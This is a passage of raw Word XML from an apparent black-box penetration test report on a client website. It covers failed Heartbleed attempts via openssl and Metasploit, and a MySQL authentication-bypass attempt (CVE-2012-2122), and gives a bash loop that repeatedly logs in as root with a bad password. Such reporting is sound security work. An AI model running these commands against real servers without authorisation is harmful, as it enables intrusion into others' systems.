        <w:t>To leverage the Heartbleed SSL/TLS attack against the target, the SSL</w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t>/TLS certificate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> were first </w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t>captured utilising the OpenSSL tool against the target with the BASH CLI syntax; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471C33">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t>s_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t xml:space="preserve"> -connect </w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t>192.185.39.52:443</w:t>
      </w:r>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471C33" w:rsidRPr="00471C33">
        <w:t>showcerts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve">]. The SSL/TLS keys were then saved to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00471C33">
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve"> machine illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="00471C33" w:rsidRPr="001A3898">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="001A3898" w:rsidRPr="001A3898">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>21.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C39DA4" w14:textId="77777777" w:rsidR="004C28D9" w:rsidRPr="007F4CB3" w:rsidRDefault="004C28D9" w:rsidP="007F4CB3"/>
    <w:p w14:paraId="2D60A109" w14:textId="77777777" w:rsidR="001A3898" w:rsidRDefault="000F467B" w:rsidP="001A3898">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358260CF" wp14:editId="3D0E67C8">
            <wp:extent cx="5029200" cy="702056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29200" cy="7020560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4ED95" w14:textId="42BB281C" w:rsidR="000F467B" w:rsidRPr="001A3898" w:rsidRDefault="001A3898" w:rsidP="001A3898">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc40134086"/>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber Website SSL/TLS Certificate Hijacked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="609B3777" w14:textId="36F19D49" w:rsidR="000F467B" w:rsidRDefault="000F467B" w:rsidP="000F467B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7214E13F" w14:textId="1F460D01" w:rsidR="000F467B" w:rsidRDefault="00471C33" w:rsidP="00471C33">
      <w:r>
        <w:t xml:space="preserve">The SSL/TLS certificate keys were then loaded into the Metasploit Frameworks Heartbleed module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the configuration details about the host such as remote host IP and service/port to leverage the attack against shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3898">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="001A3898" w:rsidRPr="001A3898">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330EC353" w14:textId="77777777" w:rsidR="00C97C20" w:rsidRDefault="000F467B" w:rsidP="00C97C20">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE5DAF3" wp14:editId="18CCBE4C">
            <wp:extent cx="5730240" cy="36423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240" cy="3642360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAAFCFB" wp14:editId="50FF402D">
            <wp:extent cx="5730240" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="381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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="9763"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="3286760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0D025" w14:textId="114A096E" w:rsidR="000F467B" w:rsidRPr="00C97C20" w:rsidRDefault="00C97C20" w:rsidP="00C97C20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc40134087"/>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22</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Heartbleed Failed Exploit Leveraged Against Target with Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="3074636F" w14:textId="01831D8C" w:rsidR="00502A33" w:rsidRPr="000F467B" w:rsidRDefault="00502A33" w:rsidP="00C97C20">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t>was not successful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve">even after the </w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve"> utilised all </w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t>exploits</w:t>
      </w:r>
      <w:r w:rsidR="00471C33">
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> to attempt to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052142C">
        <w:t>by pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052142C">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> security so the webserver would failover to </w:t>
      </w:r>
      <w:r w:rsidR="00C97C20">
        <w:t>pure</w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> SSL</w:t>
      </w:r>
      <w:r w:rsidR="00C97C20">
        <w:t>v3</w:t>
      </w:r>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> after it was identified the webserver was utilising </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052142C">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> v1.1.1 and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052142C">
        <w:t>vulerbailty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> effects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052142C">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052142C">
        <w:t xml:space="preserve"> versions 1.0 and below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F5F45" w14:textId="6DF00E4D" w:rsidR="000E05DE" w:rsidRPr="000E05DE" w:rsidRDefault="000E05DE" w:rsidP="000E05DE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc40134059"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00612AB0">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="79CA8545" w14:textId="5F602AFE" w:rsidR="007650F9" w:rsidRDefault="0052142C" w:rsidP="00C97C20">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are no security recommendations to report because the current most secure version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is being utilised by the target webserver. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941CA4B" w14:textId="01363790" w:rsidR="007650F9" w:rsidRDefault="007650F9" w:rsidP="007650F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc40134060"/>
      <w:r>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00584892">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951230">
        <w:t>MySQL Authentication Bypass Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="40C2040A" w14:textId="3ED6B85B" w:rsidR="00951230" w:rsidRPr="00951230" w:rsidRDefault="00322679" w:rsidP="005668EE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The MySQL and MariaDB authentication bypass</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951230">
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118" w:rsidRPr="00AC7118">
        <w:t>CVE-2012-2122</w:t>
      </w:r>
      <w:r w:rsidR="00AC7118">
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r w:rsidR="00951230">
        <w:t xml:space="preserve">takes </w:t>
      </w:r>
      <w:r w:rsidR="005668EE">
        <w:t>advantage</w:t>
      </w:r>
      <w:r w:rsidR="00951230">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="005668EE">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005668EE">
        <w:t>memcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005668EE">
        <w:t xml:space="preserve">() routine that presents with values outside of the expected norm of -128 through 127. When a code is optimised to purposefully return a value outside of this range, the code that compares the password to the stored hashes will authenticate even if the password is incorrect. Because the target website was utilising a MySQL server identified from the Nmap scan, the security researcher decided to attempt to leverage this attack against the target using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005668EE">
        <w:t>mysql_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005668EE">
        <w:t xml:space="preserve"> dump module within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005668EE">
        <w:t>Metaplsoit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005668EE">
        <w:t xml:space="preserve"> Framework shown in </w:t>
      </w:r>
      <w:r w:rsidR="005668EE" w:rsidRPr="00C97C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00C97C20" w:rsidRPr="00C97C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="00C97C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0F884" w14:textId="77777777" w:rsidR="00C97C20" w:rsidRDefault="00AC0BE0" w:rsidP="00C97C20">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444346F1" wp14:editId="3A7528AA">
            <wp:extent cx="5730240" cy="1629076"/>
            <wp:effectExtent l="0" t="0" r="381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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="55274"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="1629076"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7233D788" w14:textId="41093C2F" w:rsidR="007650F9" w:rsidRPr="00C97C20" w:rsidRDefault="00C97C20" w:rsidP="00C97C20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc40134088"/>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23</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: MySQL Common Exploit Leveraged Against Target Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="61FB8DA6" w14:textId="755C1577" w:rsidR="007F4CB3" w:rsidRDefault="00907F7E" w:rsidP="007650F9">
      <w:r>
        <w:t>The output in the above image shows the authentication bypass was successful up until 30% where the exploit then failed, this was assumed by the researcher to be because the server is utilising a MySQL patched version of 5.1 or above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B06B31" w14:textId="08DC57C6" w:rsidR="00907F7E" w:rsidRDefault="00322679" w:rsidP="007650F9">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>explit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can also be leveraged from a raw BASH CLI with the syntax: </w:t>
      </w:r>
      <w:r w:rsidRPr="00322679">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322679">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322679">
        <w:t xml:space="preserve"> in `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322679">
        <w:t>seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322679">
        <w:t xml:space="preserve"> 1 1000`; do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322679">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322679">
        <w:t xml:space="preserve"> -u root --password=bad -h 127.0.0.1 2&gt;/dev/null; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364FF42A" w14:textId="6008AC96" w:rsidR="00BE31CC" w:rsidRDefault="007650F9" w:rsidP="007F4CB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc40134061"/>
      <w:r>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00584892">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="004C60AE">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="06288A91" w14:textId="6DBBCB5F" w:rsidR="007F4CB3" w:rsidRPr="007F4CB3" w:rsidRDefault="00322679" w:rsidP="007F4CB3">
      <w:r>
        <w:t xml:space="preserve">There are no security recommendations to report for this exploit because the current most secure version of MySQL is being utilised by the target webserver that is not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulernable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BEADB" w14:textId="00D34DCD" w:rsidR="001520A9" w:rsidRDefault="003210F9" w:rsidP="003210F9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: Due to the website www.tevelcyber.com being taken offline intermittently during the timeframe of the penetration test along with the security of the website being substantially upgraded throughout the penetration test timeframe, a full security audit of the target website was not able to be </w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve">thoroughly </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">completed using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC780B">
        <w:t xml:space="preserve">the vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00BC780B" w:rsidRPr="00BC780B">
        <w:t xml:space="preserve">and open ports services </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC780B">
        <w:t>previously found</w:t>
      </w:r>
      <w:r>
        <w:t>. As of writing this document [08/10/20], the website has now been taken offline indefinitely.</w:t>
      </w:r>
      <w:r w:rsidR="00EF183F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4145" w14:textId="6737AC64" w:rsidR="00C5650F" w:rsidRDefault="00EF183F" w:rsidP="00AC7118">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore, the results pertaining to the ‘Black Box’ penetration attack may be skewed as additional information pertaining to the target along with the execution of a number of discovered vulnerabilities was unable to be collected and exploited during the downtime of the target website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD7861" w14:textId="43095BA5" w:rsidR="00E92815" w:rsidRPr="00AC7118" w:rsidRDefault="00E92815" w:rsidP="00AC7118">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The lambda function API vulnerability discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92815">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cloud Services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> research section of this report was not scanned for vulnerabilities on the target website or attempted to be exploited due to the exploit gaining access to the underlying CSP infrastructure which would be illegal due to the researcher not having permission to perform the exploit by the CSP; HostGator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4146" w14:textId="69A5186A" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc40134062"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cost of </w:t>
      </w:r>
      <w:r w:rsidR="00DB6077">
        <w:t>‘Black Box’ Penetration Security Test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="093FB0A3" w14:textId="66849B7A" w:rsidR="00DB6077" w:rsidRDefault="00DB6077" w:rsidP="00DB6077">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The cost of the penetration test has been itemised in the form of a</w:t>
      </w:r>
      <w:r w:rsidR="003A38A7">
        <w:t xml:space="preserve">n invoice, that was </w:t>
      </w:r>
      <w:r>
        <w:t>sent to the client ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cyber Ltd’</w:t>
      </w:r>
      <w:r w:rsidR="003A38A7">
        <w:t xml:space="preserve"> with the report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the security researcher to receive payment.</w:t>
      </w:r>
      <w:r w:rsidR="003A38A7">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00057B06">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="003A38A7">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00057B06">
        <w:t>invoice</w:t>
      </w:r>
      <w:r w:rsidR="003A38A7">
        <w:t xml:space="preserve"> can be found in </w:t>
      </w:r>
      <w:r w:rsidR="003A38A7" w:rsidRPr="00C97C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00C97C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD24694" w14:textId="77777777" w:rsidR="003A38A7" w:rsidRPr="003A38A7" w:rsidRDefault="003A38A7" w:rsidP="00DB6077"/>
    <w:p w14:paraId="17962EEF" w14:textId="77777777" w:rsidR="00C97C20" w:rsidRDefault="00057B06" w:rsidP="00C97C20">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A5467B0" wp14:editId="518D94EA">
            <wp:extent cx="5727065" cy="3385185"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="247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065" cy="3385185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AA637" w14:textId="26C2D473" w:rsidR="00057B06" w:rsidRPr="00C97C20" w:rsidRDefault="00C97C20" w:rsidP="00C97C20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc40134089"/>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C97C20">
        <w:rPr>
          <w:sz w:val="20"/>
